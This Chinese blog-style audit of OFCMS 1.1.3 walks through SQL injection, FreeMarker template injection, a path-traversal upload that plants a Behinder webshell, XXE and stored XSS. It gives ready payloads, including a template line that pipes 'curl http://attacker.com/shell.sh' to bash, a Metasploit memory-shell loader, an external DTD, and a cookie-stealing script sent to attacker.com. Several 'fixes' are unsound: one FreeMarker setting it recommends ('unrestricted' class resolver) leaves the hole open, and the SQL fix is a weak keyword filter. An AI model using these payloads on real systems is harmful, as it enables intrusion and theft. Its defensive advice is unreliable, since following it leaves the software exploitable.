1. OFCMS 1.1.3环境搭建实战搞Java代码审计的第一步永远是搭建测试环境。我花了三天时间折腾OFCMS 1.1.3的环境搭建踩过的坑比想象中多得多。这个CMS的自动安装功能基本就是个摆设最后还是得靠手动部署。下面把我验证过的完整流程分享给大家跟着做能省下至少80%的折腾时间。1.1 项目获取与基础配置源码仓库在Gitee上可以直接克隆git clone -b V1.1.3 https://gitee.com/oufu/ofcms.git用IDEA导入项目时有个关键点必须用Maven方式导入。我最初直接当普通Java项目导入结果依赖全乱套了。导入成功后先别急着启动得处理几个致命配置修改ofcms-admin/pom.xml里的jdk版本默认1.7建议改成你本地版本检查MySQL连接器版本5.x和8.x的驱动类名不同删除ofcms-admin/src/test下的测试用例有些用例会干扰启动1.2 数据库手动部署指南自动安装失败太正常了直接看手动方案。先在MySQL执行CREATE DATABASE ofcms CHARACTER SET utf8mb4; USE ofcms; SOURCE /path/to/ofcms-v1.1.3.sql;重点来了配置文件改名不是简单的重命名需要两步操作把db-config.properties复制一份改名为db.properties修改内容时注意密码加密问题如果密码含特殊字符要用\转义启动时如果报JFinalConfig相关错误试试这个命令mvn clean compile -U1.3 常见启动问题排查我遇到过最恶心的两个问题端口冲突修改ofcms-admin/src/main/webapp/WEB-INF/web.xml里的port标签静态资源加载失败检查SystemUtile.getSiteTemplatePath()返回值是否包含中文路径后台登录地址是http://localhost:8080/ofcms_admin_war/admin/index.html如果404了别慌可能是项目名没识别对试试直接访问/admin路径。2. SQL注入漏洞深度解析2.1 漏洞触发路径追踪这个SQL注入点在后台代码生成功能里特别隐蔽。通过逆向工程定位到关键代码在SystemGenerateController.create()public void create() { String sql getPara(sql); // 直接获取未过滤参数 Db.update(sql); // 动态执行SQL }JFinal框架的Db.update()虽然支持预编译但这里直接把用户输入当完整SQL执行。更危险的是这个方法在Before拦截器里居然被放行了。2.2 漏洞利用实战技巧报错注入payload需要点小技巧UPDATE of_cms_link SET link_nameupdatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schemadatabase())),1) WHERE link_id1几个注意点必须用UPDATE语句INSERT会被框架拦截字段值长度有限制用substring()分段获取数据遇到单引号过滤时可以用CHAR()函数绕过2.3 防御方案对比对比三种修复方式的效果方案实现难度安全性性能影响预编译占位符低高无SQL关键词过滤中中轻微存储过程封装高高中等实测发现最简单的修复是在Controller里加这行if(sql.contains(select) || sql.contains(union)) throw new RuntimeException(非法操作);3. SSTI模板注入攻防3.1 FreeMarker引擎漏洞原理在pom.xml里发现用的是FreeMarker 2.3.23这个版本存在模板注入风险。漏洞触发链是这样的后台修改模板内容时TemplateController.save()直接接收原始输入fileContent.replace()处理存在缺陷只做了基本HTML解码模板渲染时自动执行恶意表达式3.2 漏洞利用花样玩法除了弹计算器这种基础操作还可以#assign rtObject().getClass().forName(java.lang.Runtime).getRuntime() ${ rt.exec(curl http://attacker.com/shell.sh | bash) }更隐蔽的利用方式是用TemplateModel接口实现内存马#assign classloaderObject().getClass().getClassLoader() #assign clazzclassloader.loadClass(metasploit.Payload) ${ clazz.newInstance() }3.3 防御方案实测试了三种防护方法升级FreeMarker到2.3.31部分语法仍可执行配置TemplateExceptionHandler.RETHROW_HANDLER会破坏正常功能自定义TemplateLoader过滤危险标签推荐方案最终采用的方案是在freemarker.properties中加入template_exception_handlerrethrow new_builtin_class_resolverunrestricted4. 文件上传漏洞的花式利用4.1 漏洞点代码审计同一个TemplateController.save()方法里藏着文件上传漏洞关键问题在File file new File(pathFile, fileName); // 未校验路径穿越 FileUtils.writeString(file, fileContent); // 直接写入内容利用条件比想象中宽松不需要登录某些版本存在鉴权绕过允许上传任意后缀文件目录穿越可达web根目录4.2 冰蝎马植入实战上传jsp马时有个坑必须用URL编码后的内容。推荐用Burp的Decoder模块处理原始jsp代码 → URL编码全选编码修改file_name../../../static/shell.jsp注意路径深度用../../测试到正确层数连接时如果500报错可能是文件编码问题尝试UTF-8 without BOM路径权限问题检查tomcat的webapps目录权限冰蝎版本不匹配试试3.0或4.04.3 防御方案对比测试测试了三种防护方案文件内容校验容易被绕过白名单后缀过滤影响业务功能文件存储分离推荐方案最终采用的安全配置// 在FileUtils.writeString前添加校验 if(fileName.contains(../) || !fileName.endsWith(.html)) { throw new SecurityException(非法文件名); }5. XXE与存储型XSS漏洞挖掘5.1 XXE漏洞利用链分析ReprotAction.expReport()方法的危险调用链JasperCompileManager.compileReport() → JRXmlLoader.load() → Digester.parse() // 未禁用外部实体利用时需要先上传恶意jrxml文件!DOCTYPE xxe [!ENTITY % remote SYSTEM http://attacker.com/evil.dtd%remote;] rootexfil;/root5.2 存储型XSS的持久化攻击新闻评论处的XSS特别适合钓鱼scriptnew Image().srchttp://attacker.com/steal?cookiedocument.cookie/script在审计时发现更危险的DOM型XSSeval(location.hash.slice(1)); // 可通过#alert(1)触发5.3 综合防御建议在web.xml添加全局过滤器filter filter-namexssFilter/filter-name filter-classcom.ofsoft.cms.filter.XssFilter/filter-class /filter数据库层防御StringEscapeUtils.escapeHtml4(content); // 入库前转义响应头加固response.setHeader(X-XSS-Protection, 1; modeblock);